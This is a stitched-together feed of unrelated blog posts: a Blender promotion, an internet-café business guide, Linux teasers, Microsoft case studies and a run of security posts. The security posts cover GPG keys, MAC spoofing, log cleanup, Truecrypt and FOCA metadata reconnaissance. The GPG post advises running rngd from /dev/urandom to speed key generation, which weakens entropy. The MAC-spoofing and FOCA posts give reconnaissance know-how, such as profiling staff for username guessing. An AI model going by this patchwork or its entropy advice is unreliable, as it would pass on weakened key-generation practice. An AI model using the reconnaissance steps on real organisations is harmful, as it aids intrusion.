Creating 3D with Blender 3D

Pusatgratis – For all PG visitors interested in 3D modelling and animation: Blender 3D is free software you can use for 3D modeling, texturing, lighting, animation and video post-processing. Free and open source, Blender 3D is the most popular open source 3D suite in the world, and its features are not outclassed by expensive 3D packages such as 3ds Max, Maya or XSI.
With Blender 3D you can create animated 3D objects, interactive 3D media, professional 3D models and shapes, game objects and many other 3D creations.
Blender 3D offers the following main features:
1. a user-friendly, well-organized interface;
2. a complete 3D toolset covering modeling, UV mapping, texturing, rigging, skinning, animation, particles and other simulations, scripting, rendering, compositing, post-production and game creation;
3. cross-platform, with a uniform GUI on every platform: Blender 3D runs on all versions of Windows, Linux, OS X, FreeBSD, Irix, Sun and other operating systems;
4. high-quality 3D architecture that enables faster, more efficient work;
5. active support through forums and the community;
6. a small download size;
7. and, of course, it's free.
Below are some screenshots of 3D images and animations designed in Blender 3D.
[Screenshots: designs created with Blender 3D]
3D designs from the free, open source Blender 3D are demonstrably no worse than those from expensive 3D software :)
Download Blender 3D from the official Blender 3D site | License: free, open source | Size: 13-24 MB (depending on your operating system) | Support: all versions of Windows, Linux, OS X, FreeBSD, Irix, Sun and several other operating systems.
Happy designing!

Stop Dreaming, Start Action (willing to try and to create)

The words "stop dreaming, start action" changed my thinking. We often dream or fantasize about getting something; our ambitions can be sky-high and our hopes as tall as mountains. But do we get everything we hope for? Of course not, because action is still required, and that is what makes it hard to get what we want.
Remember: what do we actually gain in this world from dreaming alone? There is probably nobody who became rich or successful just by sitting around, lying down or idling; if such people exist, they are few, rich from an inheritance, born into a wealthy family, or simply lucky. That is the stuff of soap operas.
I receive many e-mails from Mr. Joko Susilo full of advice and motivating lessons about success, and they have shaped my thinking. They fit well with my own field, computing, and the internet in particular, and I have taken a lot from them. One lesson was that a blog must have a slogan, so my blog's slogan is about making Flash animation, which pushes me to be more creative in my work; another e-mail sent to me covered six ways to grow creativity. I am very grateful to Mr. Joko Susilo: my work may not be great, but it means something to me, because a childhood wish of mine has now come true.
The things I create are just an outlet for a hobby, but at least I am no longer only dreaming of doing this, even though I cannot draw well. Perhaps all of you can do the same and realize your dreams, even if only briefly. Life is always full of sacrifice and struggle, and the reward comes from the effort.

          Want to Build Your Own Internet Café (WARNET)?        

It has to be said that the Warung Internet (WARNET, internet café) is the workhorse technology for providing cheap Internet access to many people. Broadly, there are two (2) main aspects to consider when building a WARNET: (1) the business / management side and (2) the technology side. I strongly recommend actively following the WARNET-related mailing lists on the Internet, such as asosiasi-warnet@yahoogroups.com, asosiasi-warnet-broadband@yahoogroups.com, asosiasiwarnetbandung@yahoogroups.com, kowaba@yahoogroups.com and so on, as well as the various information-technology mailing lists, such as it-center@yahoogroups.com, linux-setup@linux.or.id, linux-admin@linux.or.id and so on.

On the business / management side, the issues usually revolve around marketing, promotion and winning customers. Never concentrate on the technical side alone, because in the end business sense is the deciding factor for your revenue.

The key issue is usually the WARNET business plan; most people feel lost because they have no firm benchmark for one. I have in fact already published a WARNET business plan as an Excel file whose figures can be adjusted to conditions in the field. That file and much other WARNET information can be downloaded free of charge at http://www.detik.com/net/kolom-warnet/ and http://www.bogor.net/idkf/fisik/warung-internet/. A business plan really has only a few components: (1) the investment, typically around Rp 4 million per PC; (2) operating costs, which mostly go to paying Telkom & the ISP, besides staff, electricity and so on; and (3) the tariff.

For those who get a feel for running a WARNET, the business sense is really very simple:

·         Put the WARNET where there are many people, especially young people.
·         The more computers in use, the lower the tariff can be, and the faster you recover your investment.
·         The minimum feasible size for Web access is about 5 computers when using a dial-up telephone connection.

Specifically for WARNETs in schools / small universities, there are a few simple extra tips:

·         If possible, have students pay directly through their tuition fees (SPP).
·         Involve students in running the WARNET, both to build a sense of ownership among them and to help them learn the technology in more depth.
·         Close off Web & chat access and use e-mail as the main communication medium on the Internet. Schools usually do not realize that Web access burns through the most telephone pulses and costs the most in Telkom charges.

As a general picture, for a school with 700 students, the cost of a WARNET facility with 10 computers is around Rp 40 million. That sounds expensive, but it is not at all. The monthly e-mail access cost to Telkom & the ISP is about Rp 500,000. Web & chat access is deliberately closed off if the principal, teachers & foundation are not confident that students can keep themselves away from bad sites while surfing.

The investment comes back in less than a year if every student is willing to pay an extra Rp 3,000/month in tuition: a small investment with a near-certain return. Besides, Rp 3,000/student/month is really very little and can easily be paid cheerfully by the students. Note that for this Rp 3,000/month/student the students only get e-mail access; Web access costs an extra Rp 3,500-5,000/hour as in an ordinary WARNET, or, if the WARNET operator is creative enough, part of the Web can be served from a local CD-ROM. Once the first year is over and the investment is recovered, the profits can be reinvested in additional computers so that Internet access becomes better and easier for the students.
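To make the payback arithmetic above concrete, here is a small sketch. The figures are the article's own; it counts e-mail-fee revenue only, ignoring the extra Rp 3,500-5,000/hour charged for Web access, which is what can bring the payback under a year:

```python
import math

# Figures taken from the article (all amounts in rupiah)
investment = 40_000_000      # 10-PC WARNET facility for the school
students = 700               # number of students paying the surcharge
fee_per_student = 3_000      # extra SPP per student per month
monthly_costs = 500_000      # Telkom + ISP charges for e-mail access

# Net margin per month from the SPP surcharge alone
monthly_margin = students * fee_per_student - monthly_costs

# Simple payback period, rounded up to whole months
payback_months = math.ceil(investment / monthly_margin)
print(monthly_margin, payback_months)
```

With these numbers the surcharge alone yields Rp 1,600,000/month and a simple payback of 25 months, so the under-a-year estimate relies on the additional hourly Web revenue.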

On the technology side of the Warung Internet there are several big issues to consider. The figure shows the general topology of a simple, conventional WARNET: a Local Area Network (LAN) connected to the Internet through a gateway that sometimes also acts as a server. At a more complex level, this concept extends easily to networks in residential complexes (creating an RT/RW-net), shopping complexes, office complexes, schools and campuses, ultimately allowing Indonesians to access the Internet at very low cost.

Local Area Network (LAN) techniques are fairly mature; a WARNET usually uses a bus topology with 100BaseT Ethernet, cheap on the local market, running the LAN at 100Mbps. A good Ethernet card can be had for about Rp 150,000; it is best not to buy the very cheapest ones (around Rp 70,000) because they are usually poor. In campus networks and residential or office complexes the techniques naturally become more complex.

The long-distance link from the WARNET to the ISP and on to the international Internet comes in many variations. The cheapest technique is dial-up over Telkom's telephone lines to a local ISP, exactly the same arrangement we use to access the Internet from home. The maximum speed in Indonesia is generally about 33.6Kbps because the existing Telkom network is of poor quality. A fairly active WARNET on such a dial-up line spends about Rp 2.5 million/month, and the 33.6Kbps ceiling limits the number of computers that can share the access to about 7-10.

The more advanced WARNETs, office complexes and residential complexes generally no longer use Telkom: besides the mediocre network quality, the access speed is low, all of which cuts into WARNET profit. These more advanced groups typically use home-built microwave equipment in the 2.4GHz band; some are experimenting at 5.8GHz, and lately a few have been trying infrared light links between buildings in Jakarta. The transmission speeds achievable with this microwave / infrared equipment are quite astonishing, about 2-11Mbps, far higher than Telkom offers. Pushed hard, an infrared link can reach 155Mbps.

The WARNET community in Bandung has been bold enough to build its own earth station for direct Internet access at 1Mbps, which is then redistributed over 2.4GHz microwave at 11Mbps. The whole infrastructure is shared among a few dozen WARNETs at a cost of about Rp 4-5.5 million/month/WARNET: quite cheap, considering the 1Mbps to the Internet and 11Mbps between WARNETs.

On another occasion I will try to explain this Warung Internet technology in more detail. I suggest, if you can, being active on the various WARNET mailing lists and picking up the free WARNET material at http://www.bogor.net/idkf.

          How to Sell Linux        
Sell, verb (used with object): to persuade or induce (someone) to buy or use something. That's one of the many definitions of the word sell, and it is also the definition that allows me to use the word in this context. This post is all about how we (as a community of Linux users) could persuade […]
          New Page- My Videos        
I’ve created a new page called My Videos. It will be a mix of my favourite videos and the ones I create, all of which will be tutorials on Windows, Mac and Linux as well as online stuff.
          Lamp, Mamp and Wamp        
LAMP is an acronym of Linux, Apache, MySQL and PHP. MAMP is an acronym of Mac, Apache, MySQL and PHP. And, as expected, WAMP is an acronym of Windows, Apache, MySQL and PHP. Each is a download that packages together Apache, MySQL and PHP and allows you to build and host websites locally. It is […]
          Ubuntu 10.04- Mac?        
Over the past couple of weeks since Ubuntu 10.04 was released, I, along with all the other users, have been discovering how much like Mac OS X it is becoming. I mean solely the interface, like the buttons moving to the left and all that jazz. Another feature which, while trawling through my long list […]
          How to Make Awesome Wallpapers in GIMP        
GIMP is my image editor/creator of choice on both Windows and Linux; however, I prefer Photoshop on Mac. If you have any experience of Photoshop you will know how to use its tools, brushes and effects. GIMP, as I have reviewed before in both ‘5 Lightweight Alternatives to Popular Applications‘ and in ‘Top […]
          5 Lightweight Alternatives to Popular Applications        
Okay, so if you have been reading my blog regularly, you will have noticed that I love free, open source software, which in many cases is an alternative to popular, expensive and, worst of all, closed-source software. Here is my list of 5 Lightweight Alternatives to Popular Applications (with a brief introduction and explanation of […]
          Some Awesome Gaming        
Now, Mac and Linux are often criticized for the lack of good games available on the two platforms compared to Windows. Perhaps Mac is moving in the right direction towards native big-budget games; however, Linux is not. We may have WINE, which is something I will do a feature on, but it doesn't replace the real game.
          5 Browsers You’ve Never Heard Of        
Over the past few years many different browsers have been created and become very popular, for example Mozilla Firefox and Google Chrome; however, there are many browsers which are generally unheard of among the majority of web users. Here are 5 of them.
          Top 5 Free Windows Applications        
Here is my view on what the top 5 free Windows apps are. All the apps' websites are linked in their names. Also, I have left out software such as browsers, as I will be doing a later focus on those.
          5 Great Firefox Addons        
Firefox is one of the great open-source projects around, and with the Mozilla Foundation behind it, it has a huge community of developers creating add-ons for Firefox, Thunderbird and SeaMonkey. Firefox has a great selection of add-ons available: from shopping to social networking, from blogging to download management, Firefox has an add-on for it.
          Comment on Goldengate 12c Troubleshooting Using LogDump Utility by JayaKishore        
Hi, I have a doubt. I installed GoldenGate 11 on my server, and when I run HELP it gives nothing:

[oracle@ip-172-31-22-99 gg_11g2]$ pwd
/u01/app/oracle/oradata/orcl/product/gg_11g2
[oracle@ip-172-31-22-99 gg_11g2]$ ./ggsci
Oracle GoldenGate Command Interpreter for Oracle
Version 17888650 OGGCORE_11. Linux, x64, 64bit (optimized), Oracle 11g on Dec 16 2013 03:43:25
Copyright (C) 1995, 2013, Oracle and/or its affiliates. All rights reserved.
GGSCI (ip-172-31-22-99) 1> help
No help available.

Why?
          Ubuntu Console on Windows 10        

I have always thought that what Windows really needs in order to be a complete development tool is a powerful console like the one in Linux; in fact, that is the reason I use Mac OS, a... Continue reading

The post "Consola de Ubuntu en Windows 10" was first published on Juarbo.

          KLM Implements a Private Cloud        
KLM already had a mature IT environment, fully virtualized apart from Linux. The implementation of a private cloud is the next step in the growth model. "We chose Microsoft's technology because it enables us to host multiple OSes in a single cloud. That way we stay maximally flexible." A conversation with Timor Slamet and Irma van der Kroef. In the summer of 2011, Timor Slamet drew up a plan to move KLM's ICT into a private cloud step by step. As technical director at KLM IT Operations, Slamet is responsible for the architecture and engineering of the IT infrastructure.
          Vrije Universiteit Amsterdam saves €185,000 by forgoing a storage investment while creating more storage capacity with Exchange Server 2010        
Some years ago the VU rolled out a communication platform for its students based on Cyrus IMAP on a Linux server, growing student mailboxes to 300 MB. "Even so, that was not enough for the students. Moreover, Cyrus lacks some elementary functions, such as a calendar, and the students found the interface unfriendly. Personally, I consider that mail environment more of a solution for techies, while most of our students are simply users. They own all kinds of mobile devices and computers and want a solution that lets them reach their mail and calendar on all those devices without much trouble. With Cyrus we could not easily deliver that," says Chris Slijkhuis. Since the introduction of Exchange Server 2010, the VU's staff and 21,000 students can reach their mail and calendar on any device and share their calendars with colleagues and fellow students. They all have bigger mailboxes now, and the VU records a substantial cost saving. The university had reserved €185,000 for hardware investment. Chris Slijkhuis: "This investment was needed for Exchange Server 2007 and covered €35,000 for extra blade servers and at least €150,000 for SAS storage equipment. By deploying Exchange Server 2010 instead of the 2007 version, we did not need to make this investment. So we saved €185,000, while student mailbox capacity grew by no less than 67 percent!" The migration to Exchange Server 2010 for the entire VU will be complete by the end of next year. In that period the university also plans to implement Unified Messaging in the communication environment, supported by Microsoft Office Communications Server 2007. That will give users a single unified inbox for e-mail, voicemail and instant messaging (IM).
          Multi Instruments improves its infrastructure with Windows Small Business Server and saves on licensing costs        
Until early last year, Multi Instruments used a web and mail solution running on a Linux server at an external provider. Jack van Dalen, financial director of Multi Instruments: "We had more and more problems with mail traffic. The Linux server was regularly down, attachments could not be opened, users had to clean out their own mailboxes or mail traffic would grind to a halt, and so on." To shape the new infrastructure, Multi Instruments turned early last year to Microsoft Certified Partner Tredion Automatisering. Tredion director Jan van Wijgerden: "Multi Instruments wanted a server the company could manage itself and that could do everything. First of all it had to serve as a file server, it had to offer all modern communication facilities, full integration of mail, contacts, calendar and (laptop) mobility, and all of it had to connect seamlessly to Microsoft Dynamics NAV. If you want that much functionality, you quickly end up at Microsoft Windows Small Business Server 2008 Premium." Windows Small Business Server 2008 is a suite of server products, including the latest versions of Windows Server, Exchange Server and SQL Server. Van Dalen: "Compared with the old Linux solution, Exchange Server gives us a reliable, scalable and manageable communication platform, both external and internal: for low operating costs we now exchange messages and files 24 hours a day. Some thirty users, ten of them in the field, use the new platform." On the scalability of Windows Small Business Server, Jan van Wijgerden says: "This solution leaves room to grow to 75 users." Another advantage is the licensing benefit. Multi Instruments already had a Microsoft SQL Server license, used among other things for payroll and the Exact accounting package.
Because SQL Server is a standard component of Windows Small Business Server 2008 Premium, that license could be dropped, which benefits the TCO. Incidentally, the Exact package is no longer in use. Van Dalen: "Since the start of this (financial) year we run our ERP entirely on Microsoft Dynamics NAV. We only use Exact to consult the books of previous financial years." The integration of Dynamics NAV with the communication facilities is realized through Microsoft Outlook. Van Dalen: "The Outlook link offers enormous possibilities. Our staff can, for example, drive a mailing campaign and send it to the contacts whose details are in Dynamics. They can also record tasks and notes against those customer records. All quotations are now sent by e-mail!"
          Red Hat Enterprise Linux gets cozy with MongoDB        
Easing the path for organizations to launch big data-styled services, Red Hat has coupled the 10gen MongoDB data store to its new identity management package for the Red Hat Enterprise Linux (RHEL) distribution.
          How to Generate GPG Public / Private Key Pair (RSA / DSA / ElGamal)?        
Written by Pranshu Bajpai

This post is meant to simplify the procedure for generating GnuPG keys on a Linux machine. In the example below, I am generating a 4096-bit RSA public/private key pair.

Step 1. Initiate the generation process

#gpg --gen-key
This initiates the generation process. You have to answer some questions to configure the required key size and your details. For example, you must select from the several kinds of keys available; if you do not know which one you need, the default option (1) will do fine.

I usually select my key size to be 4096 bits which is quite strong. You can do the same or select a lower bit size. Next, select an expiration date for your key -- I chose 'never'.

Step 2. Generate entropy

The program needs entropy (randomness) to generate the keys. To supply it, type on the keyboard, move the mouse pointer, or generate some disk activity. Even so, you may have to wait a while before the keys are generated.

For this reason, I use rng-tools to generate randomness. First install 'rng-tools' by typing:
#apt-get install rng-tools
Run the tool: 
#rngd -r /dev/urandom
The process of finding entropy should now conclude faster. On my system, it was almost instantaneous.
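You can see how starved (or well-fed) the kernel's entropy pool is before and after starting rngd; the kernel exposes the current estimate through procfs:

```shell
# Current entropy estimate, in bits; gpg stalls during key generation when this is low
cat /proc/sys/kernel/random/entropy_avail
```

Running this once before and once after `rngd -r /dev/urandom` makes the difference obvious.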

Step 3. Check ~/.gnupg to locate the keys

Once the keys are generated, they are usually stored in ~/.gnupg, a hidden gnupg directory in the home folder. You can list your keys by typing:

#gpg -k
The key fingerprint can be obtained by:
   #gpg --fingerprint

Step 4. Export the public key to be shared with others

For others to be able to communicate with you, you need to share your public key. So move to the ~/.gnupg folder and export the public key:

#gpg --armor --export email@host.com > pub_key.asc
'ls' should now show you a new file in the folder called 'pub_key.asc'. 'cat' will show you that this is the public key file.
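Once someone has imported your exported key, they can encrypt files that only your private key can decrypt. A sketch of the round trip (the file names and the email@host.com address are placeholders carried over from the example above):

```shell
# On the other party's machine: import your public key...
gpg --import pub_key.asc
# ...and encrypt a file to you (writes secret.txt.asc)
gpg --armor --encrypt --recipient email@host.com secret.txt

# Back on your machine: decrypt with your private key
gpg --decrypt secret.txt.asc > secret.txt
```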

Important !

Needless to say, do not share your private key with anyone.
          [MACchanger] Spoofed MAC address changes back to original permanent MAC before connecting to WiFi        
Written by Pranshu Bajpai

So I needed to spoof my machine's MAC (hardware) address as part of a routine penetration test. One problem I keep facing when using the Kali Linux utility 'macchanger' is that the MAC spoofs successfully but reverts to the original address right before I connect to a wireless access point. It's a good thing that years of working in security have made me paranoid enough to constantly check whether the spoofed MAC is actually in use: 'ifconfig' in a terminal told me it was not. Instead, right before connecting to the wireless access point, my machine went back to its original MAC address on 'wlan0'. Not good.

Solution to retain the spoofed MAC address on wlan0 in Kali Linux:

I've discovered that these 3 commands will help:

ifconfig wlan0 down
ifconfig wlan0 hw ether 00:11:22:33:44:55
ifconfig wlan0 up

Additionally, you may have to turn your WiFi off / on using the graphic panel in the top right. But now, you can connect to the wireless access point and then 'ifconfig wlan0' should reveal that your machine is using the spoofed MAC address: 00:11:22:33:44:55 as shown in image below.
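The same down/change/up sequence also works with 'macchanger' itself, as long as the interface stays down while the address is changed; a sketch using the interface and MAC from above:

```shell
ifconfig wlan0 down                        # interface must be down before changing the MAC
macchanger --mac 00:11:22:33:44:55 wlan0   # set the spoofed address (use -r for a random one)
ifconfig wlan0 up
ifconfig wlan0 | grep -i hwaddr            # verify the spoofed MAC is actually in use
```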

          /var/log Disk Space Issues | Ubuntu, Kali, Debian Linux | /var/log Fills Up Fast        
Written by Pranshu Bajpai

Recently, I started noticing that my computer kept running out of space for no reason at all. I had not downloaded any large files and my root partition should not have had any space issues, and yet the system kept telling me that I had 0 bytes available on /root/. Finding this hard to believe, I invoked the 'df' command (disk space usage):

So clearly, 100% of the disk partition was in use and 0 bytes were available to me. Next, I checked whether the system had simply run out of 'inodes' to assign to new files; this can happen if there are a great many tiny files of around 0 bytes on the machine.
#df -i

Only 11% of inodes were in use, so this was clearly not a problem of running out of inodes. This was completely baffling. The first thing to do was to locate the cause of the problem. Computers never lie: if the machine says I am running out of space on the root partition, then there must be files I do not know about, most likely 'system' files created during routine operation.

To locate the cause of the problem, I executed the following command to find all files of size greater than ~2GB:
# find / -size +2000M

Clearly, the folder '/var/log' needs my attention. Seems like some kernel log files are humongous in size and have not been 'rotated' (explained later). So, I listed the contents of this directory arranged in order of decreasing size:
#ls -s -S

That one log file, 'messages.1', was 12 GB, and the next two were 5.5 GB each. So this is what had been eating up my space. The first thing I did was run 'logrotate':
It ran for a while as it rotated the logs. logrotate automates the administration of log files on systems that generate a heavy volume of logs; it is responsible for compressing, rotating, and delivering log files.

What I hoped by running logrotate was that it would rotate and compress the old log files so I can quickly remove those from my system. Why didn't I just delete that '/var/log' directory directly? Because that would break things. '/var/log' is needed by the system and the system expects to see it. Deleting it is a bad idea. So, I needed to ensure that I don't delete anything of significance.
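For reference, rotation behavior is driven by the snippets under /etc/logrotate.d/; a minimal sketch of an entry that would keep /var/log/messages from growing unbounded (the values here are illustrative, not taken from my actual config):

```
# rotate /var/log/messages weekly, keep four compressed generations
/var/log/messages {
    weekly
    rotate 4
    compress
    missingok
    notifempty
}
```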

After a while, logrotate completed execution and I was able to see some '.gz' compressed files in this directory. I quickly removed (or deleted) these.

Still, there were two files of around 5 GB: messages.1 and kern.log.1.  Since these had already been rotated, I figured it would be safe to remove these as well. But instead of doing an 'rm' to remove them, I decided to just empty them (in case they were being used somewhere).
#> messages.1
#> kern.log.1

The size of both of these was reduced to '0' bytes. Great! Freed up a lot of disk space this way and nothing 'broken' in the process.

How did the log files become so large over such a small time period?

This is killing me. Normally, log files should not reach sizes like this if logrotate is doing its job and everything is running right. I am still interested in how the log files got so huge in the first place. Probably some service, application, or process generating a flood of errors? Maybe logrotate is not being executed by its 'cron' job? I don't know. Before emptying these log files I did look inside them for repetitive patterns, but I quickly gave up on reading 5 GB files as I was short on time.

Since this is my personal laptop that I shut down at night, as opposed to a server that is up all the time, I have installed 'anacron' and will set 'logrotate' to run under 'anacron' instead of cron. I did this because I suspect cron is not executing logrotate daily. We will see what the results are.
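Whether cron actually ran logrotate can be checked from logrotate's own state file, which records the last rotation date for each log (the paths below are the Debian defaults; they may differ on other distros):

```shell
# Each line shows a log file and the date logrotate last rotated it
cat /var/lib/logrotate/status
# The daily cron job that is supposed to be invoking logrotate
cat /etc/cron.daily/logrotate
```

If the dates in the status file are weeks old, the cron job is not firing.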

I will update this post when I have discovered the root cause of this problem.
          Multiple Screens in (Kali) Linux | How To        
Written by Pranshu Bajpai

I have felt the need for multiple screens several times, simply because of the many tabs and terminal windows I keep open on my box. To avoid constantly switching between them, I decided to bring in multiple screens. You might have felt the same--especially if you work with multiple applications simultaneously. Some people use multiple screens while playing games as well.

Before I brought in new screens, I wanted to get a 'feel' of using them, and decide whether this is something I would be comfortable with while working. Fortunately, I had an old LG 17'' CRT monitor lying around which I used for testing this set up of multiple screens. Here, the operating system I am using is Kali Linux (Debian 7 wheezy) but the process is fairly straightforward and would work for any Linux (or Windows) box.

How to set up multiple screen on (Kali) Linux

Firstly, you need to make the hardware connection, that is, connect the other screen's display cable to your machine. In my case, I connected the old CRT monitor's VGA cable to my HP laptop.

You need to locate the 'Display' panel to set up the initial configuration. This should not be hard to do. On a Debian or Kali Linux box, this would be under 'Applications' --> 'System Tools' --> 'Preferences' --> 'System Settings' --> 'Displays'

The location of 'Displays' could vary according to your Linux distro, however, again, it should not be hard to locate. Once inside, you will see that your OS has detected the two displays. Uncheck 'Mirror displays'. By default, your laptop's screen is the primary display and would be on the left. You can drag and change this so that the laptop's display is on the right--as I have done here.

How to set the primary display screen

By default, your laptop's screen is your primary display. This means that the top panel, containing 'Applications' and 'Places', and the bottom panel, tracking open windows and tabs, would be available on the laptop's screen only. I wanted to change this so that my CRT monitor's screen was the primary screen. To do so, I edited the monitors.xml file in Linux.

Locate 'monitors.xml' under '~/.config/monitors.xml' (for root, '/root/.config/monitors.xml'). Now edit it in a text editor, modifying the lines containing '<primary>yes/no</primary>'.

In my case, I have modified the xml file so that the part corresponding to my laptop's screen says  '<primary>no</primary>', and the part corresponding to the CRT monitor says '<primary>yes</primary>'.
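For reference, the relevant part of monitors.xml looks roughly like this after the edit; only the <primary> values are swapped, and the connector names (LVDS1, VGA1) and trimmed fields vary per machine:

```
<monitors version="1">
  <configuration>
    <output name="LVDS1">   <!-- laptop panel -->
      ...
      <primary>no</primary>
    </output>
    <output name="VGA1">    <!-- external CRT -->
      ...
      <primary>yes</primary>
    </output>
  </configuration>
</monitors>
```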

Now, the CRT monitor is the primary screen and the 'Applications', 'Places' etc would show up here. After all the set up, this is what it looks like on my box:

Note that this is the extended display corresponding to both the screens, that is, half of this shows up on one screen and half on the other. This is a picture of my set up:

Note: The Guake terminal (yellow font) has been configured to show up on both the screens. For this, I edited the '/usr/bin/guake' and changed the width from '100' to '200'.

So far, I am pleased with this multiple screen set up as it offers me a lot more work space, but it will take a little getting used to.

          How to Use Truecrypt | Truecrypt Tutorial [Screenshots] | Kali Linux, BackTrack, BackBox, Windows        
Written by Pranshu Bajpai

Data protection is crucial. The importance of privacy--especially concerning sensitive documents--cannot be overstated, and if you’re here, you have already taken the first step towards securing it.

Truecrypt is one of the best encryption tools out there. It’s free and available for Windows and Linux. It comes pre-installed in Kali Linux and Backtrack. I first came across the tool when I was reading ‘Kingpin’ (The infamous hacker Max Butler was using it to encrypt data that could be used as evidence against him).

Here is how you can set up Truecrypt for use in Kali Linux (similar procedures will work in other Linux distros and Windows).

Goto Applications -> Accessories -> Truecrypt

Truecrypt main window opens up. As this is the first time we are using Truecrypt we need to set up a volume for our use.

Click ‘Create Volume’ and the Truecrypt volume creation wizard opens up:

Click on ‘create an encrypted file container’

This container will hold your encrypted files. The files can be of any type; as long as they lie in this container, they will be encrypted once you ‘dismount’ the volume.

The next screen asks whether you want to create a Standard or Hidden volume. In the case of a hidden volume, no one can even tell that it is there, so they can’t ‘force’ you to reveal its password.

For now we will just create a ‘Standard’ volume.

On the next screen you will be asked for the ‘location’ of this volume. This can be any drive on your computer; this is where your container will lie. The container can be seen at this location, but it won’t have any extension and will have the name that you give it during this set up.

Choose any ‘location’ on your computer for the container and carry on to the next step.

A password is now required for this volume. This is the ‘password’ which will be used to decrypt the volume while ‘mounting’ it. Needless to say, it should be strong as a weak password defeats the whole purpose of security/encryption.

Next click on ‘Format’ and the volume creation would begin. You will be shown a progress bar and it will take some time depending on how big your volume size is.

Once the ‘Formatting’ is completed, your volume is ready to be used. You can place files in there (drag and drop works). Once done, ‘Dismount’ this volume and exit Truecrypt.

When you want to access the encrypted files in the container, fire up Truecrypt and click on any ‘Slots’ on the main window.

Now goto ‘Mount’ and point to the location of the container which you selected during setting up the volume.

It will then prompt you for the password.

If you provide the correct password, you’ll see that the volume is mounted on the ‘Slot’ you selected. If you double-click that ‘Slot’, a new explorer window opens where you can see your decrypted files and work with them. You can also add more files to the container if you want.

After you’re done, ‘Dismount’ the volume and exit Truecrypt.
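On Linux, TrueCrypt also ships a text-mode interface, so the same mount/dismount cycle can be scripted. A sketch, assuming the container created above lives at /root/container.tc (a placeholder path); check `truecrypt -h` for the exact flags on your build:

```shell
truecrypt -t /root/container.tc /media/truecrypt1   # prompts for the password, then mounts
truecrypt -t -l                                     # list currently mounted volumes
truecrypt -d                                        # dismount all mounted volumes
```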

          FOCA Metadata Analysis Tool        
Written by Pranshu Bajpai

Foca is an easy-to-use GUI tool for Windows that automates the process of searching a website to grab documents and extract information. Foca also helps in structuring and storing the Metadata revealed. Here we explore the importance of Foca for Penetration Testers.

Figure 1: Foca ‘New Project’ Window

Penetration Testers are well-versed in utilizing every bit of Information for constructing sophisticated attacks in later phases.  This information is collected in the ‘Reconnaissance’ or ‘Information gathering’ phase of the Penetration Test. A variety of tools help Penetration Testers in this phase. One such Tool is Foca.
Documents are commonly found on websites, created by internal users for a variety of purposes. Releasing such public documents is a common practice and no one thinks twice before doing so. However, these documents carry metadata such as the ‘creator’ of the document, the ‘date’ it was written, the ‘software’ used to create it, and so on. To a Black Hat Hacker looking to compromise systems, such details may reveal crucial information about the internal users and the software deployed within the organization.

What is this ‘Metadata’ and Why would we be interested in it?
The one line definition of Metadata would be “A set of data that describes and gives information about other data”. So when a Document is created, its Metadata would be the name of the ‘User’ who created it, ‘Time’ when it was created, ‘Time’ it was last modified, the ‘folder path’ and so on. As Penetration Testers we are interested in metadata because we like to collect all possible information before proceeding with the attack. Abraham Lincoln said “Give me six hours to chop down a tree and I will spend the first four sharpening the axe”. Metadata analysis is part of the Penetration Tester’s act of ‘sharpening the axe’. This Information would reveal the internal users, their emails, their software and much more.
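The kind of metadata Foca harvests can also be inspected by hand with a generic extractor. For instance, with the (separate) 'exiftool' utility installed on Linux, a single downloaded document gives up the same fields ('report.pdf' is a placeholder file name):

```shell
# Dump every metadata tag in a document pulled from the target site
exiftool report.pdf
# Just the fields an attacker cares about: author, creator application, dates
exiftool -Author -Creator -Producer -CreateDate -ModifyDate report.pdf
```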

Gathering Metadata
As Shown in Figure 1, Foca organizes various Projects, each relating to a particular domain. So if you’re frequently analyzing Metadata from several domains as a Pen Tester, it can be stored in an orderly fashion. Foca lets you crawl ‘Google’, ‘Bing’ and ‘Exalead’ looking for publicly listed documents (Figure 2).

Figure 2: Foca searching for documents online as well as detecting insecure methods
You can discover the following types of documents:

Once the documents are listed, you have to explicitly ‘Download All’ (Figure 3).

Figure 3: Downloading Documents to a Local Drive
 Once you have the Documents in your local drive, you can ‘Extract All Metadata’ (Figure 4).

Figure 4: Extracting All Metadata from the downloaded documents
This Metadata will be stored under appropriate tabs in Foca. For example, the ‘Documents’ tab holds the list of all the documents collected, further classified into ‘Doc’, ‘Docx’, ‘Pdf’ etc. After ‘Extracting Metadata’, you can see ‘numbers’ next to ‘Users’, ‘Folders’, ‘Software’, ‘Emails’ and ‘Passwords’ (Figure 5). These ‘numbers’ depend on how much Metadata the documents have revealed. If the documents were part of a database, you would find important information about the database, like the ‘name of the database’, ‘the tables contained in it’, the ‘columns in the tables’ etc.

Figure 5: Foca showing the ‘numbers’ related to Metadata collected

Figure 6: Metadata reveals Software being used internally
Such Information can be employed during attacks. For Example, ‘Users’ can be profiled and corresponding names can be tried as ‘Usernames’ for login panels. Another Example would be that of finding out the exact software version being used internally and then trying to exploit a weakness in that software version, either over the network or by social engineering (Figure 6).
At the same time, Foca employs ‘Fuzzing’ techniques to look for ‘Insecure Methods’ (Figure 2).
Clearly Information that should stay within the organization is leaving the organization without the administrators’ knowledge. This may prove to be a critical security flaw. It’s just a matter of ‘who’ understands the importance of this information and ‘how’ to misuse it.
So Can Foca Tell Us Something About the Network?
Yes and this is one of the best features in Foca. Based on the Metadata in the documents, Foca attempts to map the Network for you. This can be a huge bonus for Pen Testers. Understanding the Network is crucial, especially in Black Box Penetration Tests.

Figure 7: Network Mapping using Foca
As seen in Figure 7, a lot of Network information may be revealed by Foca. A skilled attacker can leverage this information to his advantage and cause a variety of security problems. For example, ‘DNS Snoop’ in Foca can be used to determine what websites the internal users are visiting and at what time.
So is Foca Perfect for Metadata Analysis?
There are other Metadata Analyzers out there like Metagoofil, Cewl and Libextractor. However, Foca seems to stand out. It is mainly because it has a very easy to use interface and the nice way in which it organizes Information. Pen Testers work every day on a variety of command line tools and while they enjoy the smoothness of working in ‘shell’, their appreciation is not lost for a stable GUI tool that automates things for them. Foca does the same.
However, Foca has not been released for Linux and works under Windows only, which may be a drawback because many Penetration Testers prefer working on Linux. The creators of Foca joked about this at DEF CON 18: “Foca does not support Linux whose symbol is a Penguin. Foca (Seal) eats Penguins”.

Protection Against Such Inadvertent Information Compromise
Clearly, the public release of documents on websites is essential. The solution to the problem lies in making sure that such documents do not cough up critical information about systems, software and users. Such documents should be analyzed internally before release on the web; Foca itself can import and analyze local documents. It is wise to first locally extract and remove the Metadata contained in documents before publishing them, for example with a tool called ‘OOMetaExtractor’. Also, a plugin called ‘IIS Metashield Protector’ can be installed on your server to strip a document of all its Metadata before the server serves it.


